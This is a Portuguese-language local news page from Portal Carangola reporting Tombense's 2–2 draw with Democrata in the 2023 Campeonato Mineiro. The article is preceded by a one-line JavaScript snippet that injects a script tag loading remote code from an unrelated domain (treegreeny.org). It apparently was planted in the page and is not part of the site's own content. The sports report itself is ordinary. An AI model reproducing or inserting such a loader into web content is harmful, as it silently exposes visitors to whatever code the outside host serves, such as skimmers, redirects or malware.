;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense 2 x 2 Democrata. Expulsão, virada e pênalti foram os ingredientes da partida em Muriaé - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense 2 x 2 Democrata. Expulsão, virada e pênalti foram os ingredientes da partida em Muriaé

O Tombense empatou em 2 x 2 com o Democrata de Sete Lagoas pelo Campeonato Mineiro 2023 na tarde deste sábado (18) no Estádio Soares de Azevedo em Muriaé.

O Carcará abriu o placar no início da partida aos 3 minutos com o zagueiro Wesley logo após escanteio. Aos 31 da primeira etapa e vencendo, a equipe de Tombos teve um jogador expulso por falta cometida no meio campo.

Já no fim do primeiro tempo a equipe de Sete Lagoas chegou ao empate com Juliano. No segundo tempo em jogo muito disputado o Democrata virou o jogo aos 26 minutos e já nos acréscimos apos marcação de pênalti, Daniel Amorim deixou tudo igual.

Vale ressaltar que devido a muitas conferências ao VAR em alguns lances importantes, a partida ficou marcada pela demora nas decisões por parte da equipe de arbitragem.

O Tombense caiu para a segunda colocação do grupo C, com a vitória do Cruzeiro que assumiu a liderança, e pode até perder a segunda colocação, caso o Democrata de Governador Valadares vença na segunda-feira (20) o Pouso Alegre em casa.

A equipe volta a campo na outra segunda-feira (26) em Muriaé no Estádio Soares de Azevedo contra o Villa Nova pela sétima rodada do Campeonato Mineiro.